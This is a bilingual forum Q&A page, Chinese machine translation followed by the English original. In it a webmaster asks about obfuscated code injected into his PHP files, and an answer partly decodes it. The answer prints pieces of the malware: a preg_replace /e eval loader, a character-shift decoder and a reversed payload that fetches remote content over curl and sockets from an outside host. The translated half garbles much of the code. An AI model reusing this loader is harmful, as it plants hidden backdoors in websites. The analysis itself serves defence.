被黑网站 - 加密代码 [英] Hacked site - encrypted code

问题描述

几天前，我注意到我的服务器上几乎所有的php文件都被感染了一些加密的代码，几乎每个文件都是不同的。以下是其中一个文件的示例：

http://pastebin.com/JtkNya5m

任何人都可以告诉我这个代码做什么或如何解码？

解决方案

您可以计算一些变量的值，并开始得到您的支持。

  $ vmksmhmfuh ='preg_replace'; // substr（$ qbrqftrrvx，（44195  -  34082），（45  -  33））; 
 preg_replace（'/(.*)/ e'，$ viwdamxcpm，null）; //调用函数wgcdoznijh（）$ vmksmhmfuh（$ ywsictklpo，$ viwdamxcpm，NULL）; 
  

所以最初的目的是在脚本中调用wgcdonznijh（）函数与有效载荷，这是在pre_replace主题中通过嵌入式函数调用表达式中的/ e完成。

  / * aviewwjaxj * / eval str_replace（chr（（257-220）），chr（（483-391）），wgcdoznijh（$ tbjmmtszkv，$ qbrqftrrvx）））; / * ptnsmypopp * / 
  

如果你十六进制解码的结果，你将在这里：如果（（function_exists（ob_start）&&&（！isset（$ GLOBALS [anuna]）））/ p>

  ）{
 $ GLOBALS [anuna] = 1; 
函数fjfgg（$ n）
 {
 return chr（ord（$ n） -  1）; 
} 
 
 @error_reporting（0）; 
 preg_replace（/(.*)/ e，eval（implode（array_map（fjfgg，str_split（\x25u：f！>！（\x25\x78：！> ... 
  

以上是截断的，但你有另一个有效载荷作为新的preg_replace函数的主题再次由于它有可能执行。

它正在使用array_map上的回调来进一步解码传递给eval的有效负载。

eval的付费负载如下（十六进制解码）：

  $ t9e ='$ w9 =/(.*)/ e; $ v9 =＃5656} 5; Bv5; oc $ v5Y5; -4_g @& oc $ 5; oc $ v5Y5; -3_g @& oc $ 5; oc $ v5Y5; -2_g @&安培; OC $ 5; OC $ v5Y5; -1_g @&安培; OC $ 5; B&安培; OC $ 5 {5-6dtz55} 56;％V5）％6，n\r\\\
\\ \\r\（edolpxe&安培）％6，M $（tsil5;〜V5）BV％（6fi5;）.J（esolcW @ 5} 5; T $ 6 = 0.6％5 {6））000016，J（daerW&安培; T $（6elihw5; B和5％）QER 6 $，J（etirwW5; $ n\\\
\X 6：加入TsOH 6 = .6qer $ 5; n\0.1 / PTTH6iru $ 6TEG &安培; QER $ 5} 5;〜V5;）.J（esolcW @ 5 {6））086,1pi $ 6，J（tcennocW @（6fi5;！）PCT_LOS6，MAERTS_KCOS6，TENI_FA（etaercW @&安培; J5;〜V5）2PI $ 6 = 61pi $（6fi5;！））1PI $（gnol2pi @（pi2gnol @&安培; 2PI $ 5）X $（emanybXteg @&安培; 1PI $ 5;] yreuq[P $ 6.6\" ？ 6.6] HTAP [p $&安培; IRU $ 5; B =] yreuq [p $ 6））] yreuq ！[p $（tessi（fi5;] X[p $&安培; X $ 5 ; -lru_esrap @ 6 = p $ 5;〜V5）〜^）etaercWj4_z55} 5;％V5;〜V5）BV％（6fi5）CNI $ 6，B（edolpmi @&安培;％5; -elif @&安培; CNI $ 5;〜V5）〜^）elifj3_z5} 5; SER $ V5;〜V5）BVser $（6fi5）HC $（esolcQ5）HC $（cexeQ&安培; SER 5 $）06，REDAEH + 5;）016， TUOEMIT + 5;）16，REFSNARTNRUTER + 5;）LRU $ 6 LRU + 5）（tiniQ&安培; HC $ 5;〜V5）〜^）tiniQj2_z555} 5;％V5;〜V5）BV％（6fi5; -Z @&％5;〜v5）〜^）Zj1_z59 | 6：| 5：| B：== | V：tsoh | X：stnetnoc_teg_elif | Z：kcos $ | J：_tekcos | W：_lruc | Q ：）lru $（|  - ：_ TPOLRUC，hc $（tpotes_lruc | +：tpotes_lruc | *：= |&：=== | ^：fub $ |％：eslaf |〜：nruter | v：）〜==！ oc $（fi | Y：g noitcnuf | z：（stsixe_noitcnuf（fi {）lru $（| j}}}; eslaf nruter {esle};））8-，i $，ataDzg $（rtsbus（etalfnizg @ nruter }; 2 + i $ = i $）2& glf $（fi; 1+）i $，0\，ataDzg $（soprts = i $）61& glf $（fi; 1+）i $，0\，ataDzg $（soprts = i $）8& glf $（fi}; nelx $ + 2 + i $ = i $;））2，i $，ataDzg $（rtsbus，v （kcapnu =）nelx $（tsil {）4& glf $（fi {）0> glf $（fi;））1,3，ataDzg $（rtsbus（dro = glf $; 01 = i $ {） 80x\b8x\f1x\==）3,0，ataDzg $（rtsbus（fi {）ataDzg $（izgmoc noitcnuf {））izgmoc（stsixe_noitcnuf！（fi | 0}; 1o $〜}; = 1o $ Y;] 1 [1a $ = 1o $] 2 =>）1a $（foezis（fi;）1ac $，0FN！（edolpxe @ = 1a $;）po $，） -  $ （dtg @（2ne = 1ac $; 4g $。/。）moc。（qqc。//：ptth=  -  $;）））e& +）d& +）c& +）b& ; $）a&（edocne-（edocne  - 。？。po $ = 4g $;）999999,000001（dnar_tm = po $ {Y};= 1o $ {）））a $（rewolotrts， （i））（i））（n，/（hctam_gerp（ro）nimda）e $（rewolotrts（soprrtsQd $ Qc $（（fi;）bc1afd45 * 88275b5e * 8e4c7059 * 8359bd33（yarra = rramod ^ FLES_PH P％e ^ TSOH_PTTH％d ^ RDDA_ETOMER％c ^ REREFER_PTTH％b ^ TNEGA_RESU_PTTH％a $ {）（212yadj}; a $〜; W = a $ Y;non= a $）== W ;非= a $））W（tessi！（fi {）marap $（212kcehcj};））po $，txet $（2ne（edocne_46esab〜{）txet& j9 esle | Y：] marap $ [REVRES_ $ | |：：，| *：$，po $（43k |&; $;）| ^：（ 45k = 979 {965（stsixe_328164sserpmocnuzg08164izgmoc08164etalfnizg09 {9）llun9 = 9htgnel $ 9,4oocd939 {9）） oocd（stsixe_3 2！| *; * zd $ *））* edocedzg * zc $（* noitcnuf *（fi * zd $ nruter）* @ = zd $（==！eslaf（fi;）j（trats_boU ~~~~; t $ U&安培; zesleU〜）W％Y％RzesleU〜;）w @ý@ RU;）v $（oocd = T $ U; 54 + 36Q14 + c6Q06 + 56Q26 + p $ = T;05 + 36Q46 + 16Q55 +p $ = 1p $;f5Q74 + 56Q26 + 07Q= p $ U;）enonU：gnidocnE-tnetnoC（redaeHz）v $（jUwz））j（stsixe_w！k9 | U：2p $ | T：x || | Q：1 || | +：nruter |&：lmth |％：ydob | @：} |〜：{| z：（fi | k：22ap | j：noitcnuf | w：是\ \（/（T& z））t $，是/ | Y：/ \< \ /（1p $ k | R：1，t $，1 $。n\。）（212yad，is /）> \ *]> \ ^ [| W＃; $ syv =eval（str_replace（array; $ siv =str_replace ; $ slv =strrev; $ s1v =create_function; $ svv =＃//} 9; g $ ^ s $ 9nruter9} 9;）8,0，q $（r $ = g $ 9; ） 46x.x x\16\17x\？ .Q $ .G $（M $， * H（p $ 9 = 9Q $ 9 {9））S $（升$≤）克$ （升$（9elihw9 ; 9 =9克$ 9章; 53X $ 1\d6x\= M $; 261'x1x.1x\= R $; 351xa\07x\= p $ ;651.x％1x& 1x\= l $ 9 {9} q $ 9，s $（2ne9noitcnuf;}＃; $ n9 =＃1067 | 416 | 779 | 223 | 361＃; $ ll =preg_replace ; $ ee1 = array（＃\14＃，＃，$＃，＃）{＃，＃[$ i]＃，＃substr（$＃，＃a = $ xx（| STRP os（$ y，9）＃，＃= str_replace（$＃，＃x3＃，＃\x7＃，＃\15＃，＃; $ i ++）{＃，＃function＃，＃x6＃ ＃）; ＃，＃for（$ i = 0; $ i 
  

哪个看起来被截断...

这是我有时间的，但如果你想继续，你可能会发现以下url有用。

http://ddecode.com/

祝你好运

Couple days ago I gave noticed that almost all php files on my server are infected with some encrypted code and in almost every file is different. Here is the example from one of the files:

http://pastebin.com/JtkNya5m

Can anybody tell me what this code do or how to decode it?

解决方案

You can calculate the values of some of the variables, and begin to get your bearings.

$vmksmhmfuh = 'preg_replace'; //substr($qbrqftrrvx, (44195 - 34082), (45 - 33));
preg_replace('/(.*)/e', $viwdamxcpm, null); //  Calls the function wgcdoznijh() $vmksmhmfuh($ywsictklpo, $viwdamxcpm, NULL);

So the initial purpose is to call the wgcdonznijh() function with the payloads in the script, this is done by way of an embedded function call in the pre_replace subject the /e in the expression.

 /* aviewwjaxj */ eval(str_replace(chr((257-220)), chr((483-391)), wgcdoznijh($tbjmmtszkv,$qbrqftrrvx))); /* ptnsmypopp */ 

If you hex decode the result of that you will be just about here:

if ((function_exists("ob_start") && (!isset($GLOBALS["anuna"])))) {
    $GLOBALS["anuna"] = 1;
    function fjfgg($n)
    {
        return chr(ord($n) - 1);
    }

    @error_reporting(0);
    preg_replace("/(.*)/e", "eval(implode(array_map("fjfgg",str_split("\x25u:f!>!(\x25\x78:!> ...

The above is truncated, but you have another payload as the subject of the new preg_replace function. Again due to e it has the potential to execute.

and it is using the callback on array_map to further decode the payload which passed to the eval.

The pay load for eval looks like this (hex decoded):

$t9e = '$w9 ="/(.*)/e";$v9 = #5656}5;Bv5;oc$v5Y5;-4_g@&oc$5;oc$v5Y5;-3_g@&oc$5;oc$v5Y5;-2_g@&oc$5;oc$v5Y5;-1_g@&oc$5;B&oc$5{5-6dtz55}56;%v5;)%6,"n\r\n\r\"(edolpxe&)%6,m$(tsil5;~v5)BV%(6fi5;)J(esolcW@5}5;t$6=.6%5{6))000016,J(daerW&t$(6elihw5;B&%5;)qer$6,J(etirwW5;"n\n\X$6:tsoH"6=.6qer$5;"n\0.1/PTTH6iru$6TEG"&qer$5}5;~v5;)J(esolcW@5{6))086,1pi$6,J(tcennocW@!(6fi5;)PCT_LOS6,MAERTS_KCOS6,TENI_FA(etaercW@&J5;~v5)2pi$6=!61pi$(6fi5;))1pi$(gnol2pi@(pi2gnol@&2pi$5;)X$(emanybXteg@&1pi$5;]"yreuq"[p$6.6"?"6.6]"htap"[p$&iru$5;B=]"yreuq"[p$6))]"yreuq"[p$(tessi!(fi5;]"X"[p$&X$5;-lru_esrap@6=p$5;~v5)~^)"etaercWj4_z55}5;%v5;~v5)BV%(6fi5;)cni$6,B(edolpmi@&%5;-elif@&cni$5;~v5)~^)"elifj3_z5}5;ser$v5;~v5)BVser$(6fi5;)hc$(esolcQ5;)hc$(cexeQ&ser$5;)06,REDAEH+5;)016,TUOEMIT+5;)16,REFSNARTNRUTER+5;)lru$6,LRU+5;)(tiniQ&hc$5;~v5)~^)"tiniQj2_z555}5;%v5;~v5)BV%(6fi5;-Z@&%5;~v5)~^)"Zj1_z59 |6: |5:""|B: == |V:tsoh|X:stnetnoc_teg_elif|Z:kcos$|J:_tekcos|W:_lruc|Q:)lru$(|-:_TPOLRUC ,hc$(tpotes_lruc|+:tpotes_lruc|*: = |&: === |^:fub$|%:eslaf|~: nruter|v:)~ ==! oc$( fi|Y:g noitcnuf|z:"(stsixe_noitcnuf( fi { )lru$(|j}}};eslaf nruter {esle };))8-,i$,ataDzg$(rtsbus(etalfnizg@ nruter };2+i$=i$ )2 & glf$ ( fi ;1+)i$ ,"0\",ataDzg$(soprts=i$ )61 & glf$( fi ;1+)i$,"0\",ataDzg$(soprts=i$ )8 & glf$( fi };nelx$+2+i$=i$ ;))2,i$,ataDzg$(rtsbus,"v"(kcapnu=)nelx$(tsil { )4 & glf$( fi { )0>glf$( fi ;))1,3,ataDzg$(rtsbus(dro=glf$ ;01=i$ { )"80x\b8x\f1x\"==)3,0,ataDzg$(rtsbus( fi { )ataDzg$(izgmoc noitcnuf { ))"izgmoc"(stsixe_noitcnuf!( fi|0} ;1o$~ } ;"" = 1o$Y;]1[1a$ = 1o$ )2=>)1a$(foezis( fi ;)1ac$,"0FN!"(edolpxe@=1a$ ;)po$,)-$(dtg@(2ne=1ac$ ;4g$."/".)"moc."(qqc."//:ptth"=-$ ;)))e&+)d&+)c&+)b&+)a&(edocne-(edocne-."?".po$=4g$ ;)999999,000001(dnar_tm=po$ {Y} ;"" = 1o$ { ) )))a$(rewolotrts ,"i/" . ))"relbmar*xednay*revihcra_ai*tobnsm*pruls*elgoog"(yarra ,"|"(edolpmi . "/"(hctam_gerp( ro )"nimda",)e$(rewolotrts(soprrtsQd$(Qc$(Qa$(( fi ;)"bc1afd45*88275b5e*8e4c7059*8359bd33"(yarra = rramod^FLES_PHP%e^TSOH_PTTH%d^RDDA_ETOMER%c^REREFER_PTTH%b^TNEGA_RESU_PTTH%a$ { )(212yadj } ;a$~ ;W=a$Y;"non"=a$ )""==W( fiY;"non"=a$ ))W(tessi!(fi { )marap$(212kcehcj } ;))po$ ,txet$(2ne(edocne_46esab~ { )txet&j9 esle |Y:]marap$[REVRES_$|W: ro )"non"==|Q:lru|-:.".".|+:","|*:$,po$(43k|&:$ ;)"|^:"(212kcehc=|%: nruter|~: noitcnuf|j}}8zc$9nruter9}817==!9eslaf28)45@9=979{96"5"(stsixe_328164sserpmocnuzg08164izgmoc08164etalfnizg09{9)llun9=9htgnel$9,4oocd939{9))"oocd"(stsixe_3!2| * ;*zd$*) )*edocedzg*zc$(*noitcnuf*( fi*zd$ nruter ) *@ = zd$( ==! eslaf( fi;)"j"(trats_boU~~~~;t$U&zesleU~;)W%Y%RzesleU~;)W@Y@RU;)v$(oocd=t$U;"54+36Q14+c6Q06+56Q26+".p$=T;"05+36Q46+16Q55+".p$=1p$;"f5Q74+56Q26+07Q"=p$U;)"enonU:gnidocnE-tnetnoC"(redaeHz)v$(jUwz))"j"(stsixe_w!k9 |U:2p$|T:x\|Q:1\|+:nruter|&:lmth|%:ydob|@:} |~: { |z:(fi|k:22ap|j:noitcnuf|w:/\<\(/"(T &z))t$,"is/|Y:/\<\/"(1p$k|R:1,t$ ,"1"."$"."n\".)(212yad ,"is/)>\*]>\^[|W#; $syv= "eval(str_replace(array"; $siv = "str_replace";$slv = "strrev";$s1v="create_function"; $svv = #//}9;g$^s$9nruter9}9;)8,0,q$(r$=.g$9;))"46x.x?x\16\17x\".q$.g$(m$,"*H"(p$9=9q$9{9))s$(l$<)g$(l$(9elihw9;""9=9g$9;"53x$1\d6x\"=m$;"261'x1x.1x\"=r$;"351xa\07x\"=p$;"651.x%1x&1x\"=l$9{9)q$9,s$(2ne9noitcnuf;}#; $n9 = #1067|416|779|223|361#; $ll = "preg_replace"; $ee1 = array(#\14#,#, $#,#) { #,#[$i]#,#substr($#,#a = $xx("|","#,#,strpos($y,"9")#,# = str_replace($#,#x3#,#\x7#,#\15#,#;$i++) {#,#function #,#x6#,#); #,#for($i=0;$i

Which looks truncated ...

That is far as I have time for, but if you wanted to continue you may find the following url useful.

http://ddecode.com/

Good luck

这篇关于被黑网站 - 加密代码的文章就介绍到这了，希望我们推荐的答案对大家有所帮助，也希望大家多多支持IT屋！